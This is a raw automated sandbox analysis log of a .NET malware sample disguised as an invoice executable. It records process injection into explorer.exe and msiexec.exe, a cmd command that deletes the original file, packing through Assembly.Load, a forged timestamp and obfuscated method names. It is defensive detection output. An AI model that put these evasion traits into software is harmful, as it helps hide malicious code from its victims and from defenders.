          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeProcess created: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exe "C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exe"Jump to behavior
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exe"Jump to behavior
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeSection loaded: version.dllJump to behavior
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeSection loaded: dwrite.dllJump to behavior
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeSection loaded: textshaping.dllJump to behavior
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeSection loaded: windowscodecs.dllJump to behavior
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeSection loaded: edputil.dllJump to behavior
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeSection loaded: windows.staterepositoryps.dllJump to behavior
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeSection loaded: appresolver.dllJump to behavior
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeSection loaded: bcp47langs.dllJump to behavior
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeSection loaded: slc.dllJump to behavior
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeSection loaded: sppc.dllJump to behavior
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeSection loaded: onecorecommonproxystub.dllJump to behavior
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: windows.cloudstore.schema.shell.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: mfsrcsnk.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
          Source: INVOICE - MV CNC BANGKOK - ST24PJ-278.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: INVOICE - MV CNC BANGKOK - ST24PJ-278.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: INVOICE - MV CNC BANGKOK - ST24PJ-278.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: Binary string: msiexec.pdb source: INVOICE - MV CNC BANGKOK - ST24PJ-278.exe, 00000004.00000002.2258386431.0000000000D80000.00000040.10000000.00040000.00000000.sdmp, INVOICE - MV CNC BANGKOK - ST24PJ-278.exe, 00000004.00000002.2258639330.0000000000DA8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, msiexec.exe, 00000007.00000002.4571358448.0000000000A20000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: msiexec.pdbGCTL source: INVOICE - MV CNC BANGKOK - ST24PJ-278.exe, 00000004.00000002.2258386431.0000000000D80000.00000040.10000000.00040000.00000000.sdmp, INVOICE - MV CNC BANGKOK - ST24PJ-278.exe, 00000004.00000002.2258639330.0000000000DA8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.4571358448.0000000000A20000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: wntdll.pdbUGP source: INVOICE - MV CNC BANGKOK - ST24PJ-278.exe, 00000004.00000002.2259640251.0000000001050000.00000040.00001000.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.4571896686.00000000046C0000.00000040.00001000.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.4571896686.000000000485E000.00000040.00001000.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2258620400.000000000435C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2261217913.000000000450B000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: SNCx.pdbSHA256 source: INVOICE - MV CNC BANGKOK - ST24PJ-278.exe
          Source: Binary string: wntdll.pdb source: INVOICE - MV CNC BANGKOK - ST24PJ-278.exe, INVOICE - MV CNC BANGKOK - ST24PJ-278.exe, 00000004.00000002.2259640251.0000000001050000.00000040.00001000.00020000.00000000.sdmp, msiexec.exe, msiexec.exe, 00000007.00000002.4571896686.00000000046C0000.00000040.00001000.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.4571896686.000000000485E000.00000040.00001000.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2258620400.000000000435C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2261217913.000000000450B000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: SNCx.pdb source: INVOICE - MV CNC BANGKOK - ST24PJ-278.exe

          Data Obfuscation

          barindex
          .NET source code contains potential unpacker
          Source: INVOICE - MV CNC BANGKOK - ST24PJ-278.exe, Form1.cs.Net Code: InitializeComponent
          Source: 0.2.INVOICE - MV CNC BANGKOK - ST24PJ-278.exe.6cc0000.10.raw.unpack, KmS8hjV3UlaappQopN.cs.Net Code: ogTIMeF6GM System.Reflection.Assembly.Load(byte[])
          Source: 0.2.INVOICE - MV CNC BANGKOK - ST24PJ-278.exe.3da1f00.7.raw.unpack, KmS8hjV3UlaappQopN.cs.Net Code: ogTIMeF6GM System.Reflection.Assembly.Load(byte[])
          Source: 0.2.INVOICE - MV CNC BANGKOK - ST24PJ-278.exe.3d31ee0.6.raw.unpack, KmS8hjV3UlaappQopN.cs.Net Code: ogTIMeF6GM System.Reflection.Assembly.Load(byte[])
          Source: 6.2.explorer.exe.1077f840.0.raw.unpack, Form1.cs.Net Code: InitializeComponent
          Source: 7.2.msiexec.exe.4c4f840.3.raw.unpack, Form1.cs.Net Code: InitializeComponent
          Source: INVOICE - MV CNC BANGKOK - ST24PJ-278.exeStatic PE information: 0xCF045228 [Mon Jan 22 16:34:48 2080 UTC]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_00A25C84 memset,GetACP,LoadLibraryW,GetProcAddress,GetLocaleInfoW,FreeLibrary,FormatMessageW,memset,GetVersionExW,lstrlenW,WriteFile,WriteFile,7_2_00A25C84
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_00417816 push FFFFFFDDh; ret 4_2_00417819
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_0041A48B pushfd ; retf 4_2_0041A48C
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_0041D4B5 push eax; ret 4_2_0041D508
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_0041D56C push eax; ret 4_2_0041D572
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_0041D502 push eax; ret 4_2_0041D508
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_0041D50B push eax; ret 4_2_0041D572
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_004175E0 push EB7646DEh; ret 4_2_00417616
          Source: C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exeCode function: 4_2_010809AD push ecx; mov dword ptr [esp], ecx4_2_010809B6
          Source: C:\Windows\explorer.exeCode function: 6_2_0E2E6B02 push esp; retn 0000h6_2_0E2E6B03
          Source: C:\Windows\explorer.exeCode function: 6_2_0E2E6B1E push esp; retn 0000h6_2_0E2E6B1F
          Source: C:\Windows\explorer.exeCode function: 6_2_0E2E69B5 push esp; retn 0000h6_2_0E2E6AE7
          Source: C:\Windows\explorer.exeCode function: 6_2_104D79B5 push esp; retn 0000h6_2_104D7AE7
          Source: C:\Windows\explorer.exeCode function: 6_2_104D7B02 push esp; retn 0000h6_2_104D7B03
          Source: C:\Windows\explorer.exeCode function: 6_2_104D7B1E push esp; retn 0000h6_2_104D7B1F
          Source: C:\Windows\explorer.exeCode function: 6_2_10FA29B5 push esp; retn 0000h6_2_10FA2AE7
          Source: C:\Windows\explorer.exeCode function: 6_2_10FA2B1E push esp; retn 0000h6_2_10FA2B1F
          Source: C:\Windows\explorer.exeCode function: 6_2_10FA2B02 push esp; retn 0000h6_2_10FA2B03
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_00A29F2D push ecx; ret 7_2_00A29F40
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046C27FA pushad ; ret 7_2_046C27F9
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046C225F pushad ; ret 7_2_046C27F9
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046C283D push eax; iretd 7_2_046C2858
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046F09AD push ecx; mov dword ptr [esp], ecx7_2_046F09B6
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_005EA48B pushfd ; retf 7_2_005EA48C
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_005ED4B5 push eax; ret 7_2_005ED508
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_005ED56C push eax; ret 7_2_005ED572
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_005ED50B push eax; ret 7_2_005ED572
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_005ED502 push eax; ret 7_2_005ED508
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_005E75E0 push EB7646DEh; ret 7_2_005E7616
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_005E7816 push FFFFFFDDh; ret 7_2_005E7819
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_005EDAF2 push edi; ret 7_2_005EDAF4
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0460E9B5 push esp; retn 0000h7_2_0460EAE7
          Source: INVOICE - MV CNC BANGKOK - ST24PJ-278.exeStatic PE information: section name: .text entropy: 7.907761824425078
          Source: 0.2.INVOICE - MV CNC BANGKOK - ST24PJ-278.exe.6cc0000.10.raw.unpack, NjfYrlgJga7DmojS1R.csHigh entropy of concatenated method names: 'fuGRdvt8d1', 'g5bRjaIVvo', 'Ql3RhqbPdv', 'uePhLGxNt9', 'e8OhzTcyNd', 'G6GReDKS0L', 'EuTRilD8Gt', 'lBERsYYVUf', 'gNERZoJcAC', 'x7vRICjZQy'
          Source: 0.2.INVOICE - MV CNC BANGKOK - ST24PJ-278.exe.6cc0000.10.raw.unpack, EwnlRboOeBns8xbBPq.csHigh entropy of concatenated method names: 'gvAEk3Iuhm', 'SafEOrMwiy', 'ToString', 'SLYEdtGZ0n', 'RAdEfHo9OQ', 'YUIEjqOFNG', 'XBvEpOnJxw', 'w6CEhniAWh', 'IQAERGFePL', 'HEeEVka4JB'
          Source: 0.2.INVOICE - MV CNC BANGKOK - ST24PJ-278.exe.6cc0000.10.raw.unpack, JQqsVKjWQOVtcE5Zal.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'vbQsacS2qB', 'AiTsLkJocc', 'JK1szmO07q', 'YjuZefJm7A', 'PYrZi3H9r3', 'GV9ZsU5XDG', 'PMfZZxZYD1', 'vnLvEnXYnQgmeLEXxeb'
          Source: 0.2.INVOICE - MV CNC BANGKOK - ST24PJ-278.exe.6cc0000.10.raw.unpack, k8C9r2iiXQeG8jHeUja.csHigh entropy of concatenated method names: 'ToString', 'dK8qZ6IORP', 'GZlqIf3iQt', 'kxnqDK5WVN', 'RwQqdbnCYP', 'kSDqfFugoJ', 'oHvqjagJdd', 'oEeqpRckAG', 'Jr1aGPsh4m5rGHkncG4', 'BRnPq8slAy2Egfabqps'
          Source: 0.2.INVOICE - MV CNC BANGKOK - ST24PJ-278.exe.6cc0000.10.raw.unpack, rwp6AFieXooDZJVjHdN.csHigh entropy of concatenated method names: 'CQ6BT0NXSu', 'eGJBlPBRRr', 'eNoBM32wiC', 'zwpBwQhQex', 'wkxBQdneJx', 'Mw9BHvhnaq', 'RlqB6fkFul', 'M5vBGHHZEb', 'EoDBF5HqE5', 'EBUBcNREc0'
          Source: 0.2.INVOICE - MV CNC BANGKOK - ST24PJ-278.exe.6cc0000.10.raw.unpack, stUV6qiZh6MgUg3g2B9.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'gDAqCOuXm4', 'q1Qq19jhnw', 'EHQq29PaYX', 'ig4qovnhUw', 'vUvqNvOk0Q', 'R7wqr9Bg8U', 'seVquP7LwK'
          Source: 0.2.INVOICE - MV CNC BANGKOK - ST24PJ-278.exe.6cc0000.10.raw.unpack, B6nIkZ4UqIEkYQ9uw2.csHigh entropy of concatenated method names: 'lUqUdjD4sa', 'GO4UflBv9C', 'KEtUjfwh79', 'HgRUp6k0Qp', 'UkqUh3bBPX', 'nvnURIMiMH', 'GG5UV4cFR4', 'IQMUW2tyJN', 'j4MUkca0QW', 'f8oUOv3wa9'
          Source: 0.2.INVOICE - MV CNC BANGKOK - ST24PJ-278.exe.6cc0000.10.raw.unpack, rJVou0L5V1Jte8d0ue.csHigh entropy of concatenated method names: 'OtNBixOn3C', 'CMvBZicg7S', 'RumBIn02rf', 'KsxBdFZkII', 'DGaBfKHsJE', 'JljBpiH2ZQ', 'zVDBhfbqrZ', 'mUoUuZMxDo', 'a5xU4D4W0n', 'ibYUapyVeJ'
          Source: 0.2.INVOICE - MV CNC BANGKOK - ST24PJ-278.exe.6cc0000.10.raw.unpack, XnVtWb0DxhsaseC06C.csHigh entropy of concatenated method names: 'yfxhDncfKf', 'SCehfsi9EI', 'H4jhps3WCb', 'tJ5hR5aNby', 'xTXhVit86N', 'pkUpNNpfCG', 't86prDPiws', 'U1wpueim8P', 'pRYp4FHpvI', 'GcWpa8EPCL'
          Source: 0.2.INVOICE - MV CNC BANGKOK - ST24PJ-278.exe.6cc0000.10.raw.unpack, Bx0ofA8jhf3kY44yRE.csHigh entropy of concatenated method names: 'UQayGF7ETY', 'QdZyFirkkh', 'sNqy0Of0RK', 'gBdyYyRZM5', 'uQpyv8kWXY', 'CqRySaALZB', 'Pq2ygS2qO9', 'lb5ymCkLR5', 'DXdyJLyG6Y', 'KUMythTJqB'
          Source: 0.2.INVOICE - MV CNC BANGKOK - ST24PJ-278.exe.6cc0000.10.raw.unpack, ddhwE6Ai2OALZaf3qR.csHigh entropy of concatenated method names: 'CEiRTVNlow', 'MTMRlEqPWi', 'JwURMoCGdk', 'J1wRwMhONI', 'G2mRQgf3MZ', 'OYPRHuoOhP', 'ADsR6ZG7e4', 'D3QRGyLGkn', 'tKPRFrX7QD', 'lLfRcqaYxy'
          Source: 0.2.INVOICE - MV CNC BANGKOK - ST24PJ-278.exe.6cc0000.10.raw.unpack, wJlEu0INxDpaHEuvQZ.csHigh entropy of concatenated method names: 'sNFiRAys4Y', 'r7viVGVXp1', 'Jn2ikP5D4K', 'ahViOqVPbd', 'tZ7i7o2anV', 'OWbiXDxhsa', 'V40D3gBHDK2C1IdUV1', 'SmELmbWAj06kDnNEWG', 'jFZiiAutZo', 'CociZdCwC2'
          Source: 0.2.INVOICE - MV CNC BANGKOK - ST24PJ-278.exe.6cc0000.10.raw.unpack, OsZlVmswaL3gf5RUYS.csHigh entropy of concatenated method names: 'TEkMXkNj9', 'FAgwLQvOO', 'yDhHfRQ8U', 'nbd6Omrq3', 'YotFg2w4p', 'QMZcpXukw', 'GMInvaqeKuEtseYywQ', 'cZKfkePbtCAIoosgch', 'O5nU9oP6X', 'J9AqgubOf'
          Source: 0.2.INVOICE - MV CNC BANGKOK - ST24PJ-278.exe.6cc0000.10.raw.unpack, ungwLuisBvQabOvsDHB.csHigh entropy of concatenated method names: 'T1AqTFU1S7', 'n9pqlmi2RN', 'zh2qMLM7jO', 'BO36XlsBCOIvrYHG8MR', 'ybeQ5DsWN1qLyCmVhRs', 'dKsPT7sMrhnNRtrkEQ1', 'jeElxvskXpPNW9j6UWG', 'yS2UlVsFSv7FCnit8FV'
          Source: 0.2.INVOICE - MV CNC BANGKOK - ST24PJ-278.exe.6cc0000.10.raw.unpack, NoxONxz8d7Mp0qaRrT.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'rspByROvpq', 'S8xB7gUpBn', 'kW7BX0MnsZ', 'gL1BEDTZGF', 'Q7tBUSxETS', 'VLdBBH3XYR', 'SSUBq2B9R6'
          Source: 0.2.INVOICE - MV CNC BANGKOK - ST24PJ-278.exe.6cc0000.10.raw.unpack, RxiKep2mVkECmQZ9a2.csHigh entropy of concatenated method names: 'ToString', 'AFMXtxgXpj', 'tOEXY0dY8v', 'uvGXKpsfEV', 'GeFXva8VK5', 'GJlXS8upqZ', 'wejXn9jTec', 'T37XgWge35', 'nTwXmJHyCh', 'vCSXATcBkE'
          Source: 0.2.INVOICE - MV CNC BANGKOK - ST24PJ-278.exe.6cc0000.10.raw.unpack, xfJeluaehfASS0G50k.csHigh entropy of concatenated method names: 'lmtU0pUWHL', 'zEtUYRRtDJ', 'nr6UKIuBo6', 'R8hUvSVA4x', 'WLCUC2MMLA', 'SQSUSTHKQO', 'Next', 'Next', 'Next', 'NextBytes'
          Source: 0.2.INVOICE - MV CNC BANGKOK - ST24PJ-278.exe.6cc0000.10.raw.unpack, kPbdSNcZWAPRNqZ7o2.csHigh entropy of concatenated method names: 'IkWpQCKmPw', 'YAyp6KVuIx', 'DO1jK4QlSI', 'BkAjvwKjVr', 'NrUjSnYgh9', 'H7hjnDGie6', 'zegjgpEsRw', 'OWQjm1JcV2', 'Tx6jANgkqa', 'aydjJrvyJ8'
          Source: 0.2.INVOICE - MV CNC BANGKOK - ST24PJ-278.exe.6cc0000.10.raw.unpack, AUvy7vFn2P5D4KehVq.csHigh entropy of concatenated method names: 'Gl1jwf6bOQ', 'RZ3jHwpfOD', 'FsajGOOqpm', 'DsLjFiwRhk', 'C0Wj7bj8sx', 'nsbjXH2LwF', 'TdgjEAmb9Y', 'VnxjUlqsK3', 'XEGjB5ZsUn', 'TKmjq8Llxk'
          Source: 0.2.INVOICE - MV CNC BANGKOK - ST24PJ-278.exe.6cc0000.10.raw.unpack, KtpTe5ftgXZhCg2E5w.csHigh entropy of concatenated method names: 'Dispose', 'mDiiaA1k6r', 'LAIsYR7EqV', 'D6m99Lvm84', 'UQ6iLnIkZU', 'sIEizkYQ9u', 'ProcessDialogKey', 'A29sefJelu', 'ahfsiASS0G', 'P0kssUJVou'
          Source: 0.2.INVOICE - MV CNC BANGKOK - ST24PJ-278.exe.6cc0000.10.raw.unpack, HIttxdr37CBmL9r71a.csHigh entropy of concatenated method names: 'MF5E4yhakH', 'hZ0ELOUEg6', 'HqNUeXf7xZ', 'B7xUinIZRb', 'bKWEta3s6U', 'DtdE5qwMRh', 'rTKE8JLY2w', 'inLECadrSo', 'xsFE1TSdns', 'PKKE2gbCTk'
          Source: 0.2.INVOICE - MV CNC BANGKOK - ST24PJ-278.exe.6cc0000.10.raw.unpack, EAys4YGB7vGVXp1hhL.csHigh entropy of concatenated method names: 'qXwfC4lbT9', 'gVjf1wt0tB', 'cWgf2mvKdk', 'Edmfofhive', 'vJCfN5dHWk', 'vLNfrZSAYQ', 'EXifum15ou', 'bg0f41kAnP', 'dfgfaIhptF', 'Gt3fLBqtCN'
          Source: 0.2.INVOICE - MV CNC BANGKOK - ST24PJ-278.exe.6cc0000.10.raw.unpack, BVeR06CMFHJLXbULXQ.csHigh entropy of concatenated method names: 'T7o7JYwvfU', 'r3r7564Zo1', 'CjW7Cf6Q0X', 'ADq71idqgb', 'Y7A7Y0Anyu', 'A4c7K1v2LY', 'k0F7v7c11S', 'heX7SfkOwM', 'Qy37nkJMIs', 'xdv7gHhWkb'
          Source: 0.2.INVOICE - MV CNC BANGKOK - ST24PJ-278.exe.6cc0000.10.raw.unpack, KmS8hjV3UlaappQopN.csHigh entropy of concatenated method names: 'spEZDZIhxn', 'VKuZdmI2Id', 'PxfZfHvgXq', 'mGyZjhO6sU', 'WWiZplw3IL', 'uq5Zh4qgjE', 'UUfZRSBH66', 'YySZVB1ncT', 'nFdZWmwDVS', 'YQnZkqp9Ek'
          Source: 0.2.INVOICE - MV CNC BANGKOK - ST24PJ-278.exe.3da1f00.7.raw.unpack, NjfYrlgJga7DmojS1R.csHigh entropy of concatenated method names: 'fuGRdvt8d1', 'g5bRjaIVvo', 'Ql3RhqbPdv', 'uePhLGxNt9', 'e8OhzTcyNd', 'G6GReDKS0L', 'EuTRilD8Gt', 'lBERsYYVUf', 'gNERZoJcAC', 'x7vRICjZQy'
          Source: 0.2.INVOICE - MV CNC BANGKOK - ST24PJ-278.exe.3da1f00.7.raw.unpack, EwnlRboOeBns8xbBPq.csHigh entropy of concatenated method names: 'gvAEk3Iuhm', 'SafEOrMwiy', 'ToString', 'SLYEdtGZ0n', 'RAdEfHo9OQ', 'YUIEjqOFNG', 'XBvEpOnJxw', 'w6CEhniAWh', 'IQAERGFePL', 'HEeEVka4JB'
